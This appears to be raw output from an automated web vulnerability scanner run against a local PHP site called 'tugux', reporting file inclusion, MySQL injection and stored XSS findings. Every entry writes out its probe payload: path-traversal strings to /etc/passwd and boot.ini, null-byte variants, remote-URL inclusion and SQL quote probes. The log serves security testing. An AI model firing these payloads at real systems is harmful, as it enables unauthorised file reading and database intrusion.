  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&email=on&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=9
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&name=on&submit1=Submit&topic_id=9
  coming fromhttp://localhost/tugux/comments.php?nid=9
MySQL Injection in http://localhost/tugux/latest.php?nid=9
 with params =comment=%BF%27%22%28&email=on&name=on&submit1=Submit&topic_id=9
 coming fromhttp://localhost/tugux/comments.php?nid=9
MySQL Injection in http://localhost/tugux/latest.php?nid=9
 with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%BF%27%22%28
 coming fromhttp://localhost/tugux/comments.php?nid=9
MySQL Injection in http://localhost/tugux/latest.php?nid=9
 with params =comment=on&email=on&name=%BF%27%22%28&submit1=Submit&topic_id=9
 coming fromhttp://localhost/tugux/comments.php?nid=9
MySQL Injection in http://localhost/tugux/latest.php?nid=9
 with params =comment=on&email=on&name=on&submit1=%BF%27%22%28&topic_id=9
 coming fromhttp://localhost/tugux/comments.php?nid=9
MySQL Injection in http://localhost/tugux/latest.php?nid=9
 with params =comment=on&email=%BF%27%22%28&name=on&submit1=Submit&topic_id=9
 coming fromhttp://localhost/tugux/comments.php?nid=9
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=http%3A%2F%2Fwww.google.com%2F&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=http%3A%2F%2Fwww.google.com%2F
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=http%3A%2F%2Fwww.google.com%2F&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=http%3A%2F%2Fwww.google.com%2F&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=http%3A%2F%2Fwww.google.com%2F&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=%2Fetc%2Fpasswd&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%2Fetc%2Fpasswd
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=%2Fetc%2Fpasswd&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=%2Fetc%2Fpasswd&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=%2Fetc%2Fpasswd&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=%2Fetc%2Fpasswd%00&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%2Fetc%2Fpasswd%00
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=%2Fetc%2Fpasswd%00&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=%2Fetc%2Fpasswd%00&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=%2Fetc%2Fpasswd%00&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=c%3A%5C%5Cboot.ini&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=c%3A%5C%5Cboot.ini
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=c%3A%5C%5Cboot.ini&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=c%3A%5C%5Cboot.ini&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=c%3A%5C%5Cboot.ini&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=c%3A%5C%5Cboot.ini%00&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=c%3A%5C%5Cboot.ini%00
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=c%3A%5C%5Cboot.ini%00&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=c%3A%5C%5Cboot.ini%00&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=c%3A%5C%5Cboot.ini%00&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&email=on&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=Submit&topic_id=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=on&name=on&submit1=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
Warning include in http://localhost/tugux/latest.php?nid=
  with params =comment=on&email=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&name=on&submit1=Submit&topic_id=on
  coming fromhttp://localhost/tugux/comments.php?nid=
MySQL Injection in http://localhost/tugux/latest.php?nid=
 with params =comment=%BF%27%22%28&email=on&name=on&submit1=Submit&topic_id=on
 coming fromhttp://localhost/tugux/comments.php?nid=
MySQL Injection in http://localhost/tugux/latest.php?nid=
 with params =comment=on&email=on&name=on&submit1=Submit&topic_id=%BF%27%22%28
 coming fromhttp://localhost/tugux/comments.php?nid=
MySQL Injection in http://localhost/tugux/latest.php?nid=
 with params =comment=on&email=on&name=%BF%27%22%28&submit1=Submit&topic_id=on
 coming fromhttp://localhost/tugux/comments.php?nid=
MySQL Injection in http://localhost/tugux/latest.php?nid=
 with params =comment=on&email=on&name=on&submit1=%BF%27%22%28&topic_id=on
 coming fromhttp://localhost/tugux/comments.php?nid=
MySQL Injection in http://localhost/tugux/latest.php?nid=
 with params =comment=on&email=%BF%27%22%28&name=on&submit1=Submit&topic_id=on
 coming fromhttp://localhost/tugux/comments.php?nid=
Found permanent XSS in http://localhost/tugux/latest.php?nid=
  attacked by http://localhost/tugux/latest.php?nid= with field name
Found permanent XSS in http://localhost/tugux/latest.php?nid=
  attacked by http://localhost/tugux/latest.php?nid= with field comment
Found permanent XSS in http://localhost/tugux/latest.php?nid= 10
  attacked by http://localhost/tugux/latest.php?nid= with field name
Found permanent XSS in http://localhost/tugux/latest.php?nid= 10
  attacked by http://localhost/tugux/latest.php?nid= with field comment
Found permanent XSS in http://localhost/tugux/latest.php?nid= 9
  attacked by http://localhost/tugux/latest.php?nid= with field name
Found permanent XSS in http://localhost/tugux/latest.php?nid= 9
  attacked by http://localhost/tugux/latest.php?nid= with field comment
Found permanent XSS in http://localhost/tugux/latest.php?nid=10
  attacked by http://localhost/tugux/latest.php?nid=10 with field comment
Found permanent XSS in http://localhost/tugux/latest.php?nid=10
  attacked by http://localhost/tugux/latest.php?nid=10 with field name
Found permanent XSS in http://localhost/tugux/latest.php?nid=9
  attacked by http://localhost/tugux/latest.php?nid=9 with field comment
Found permanent XSS in http://localhost/tugux/latest.php?nid=9
  attacked by http://localhost/tugux/latest.php?nid=9 with field name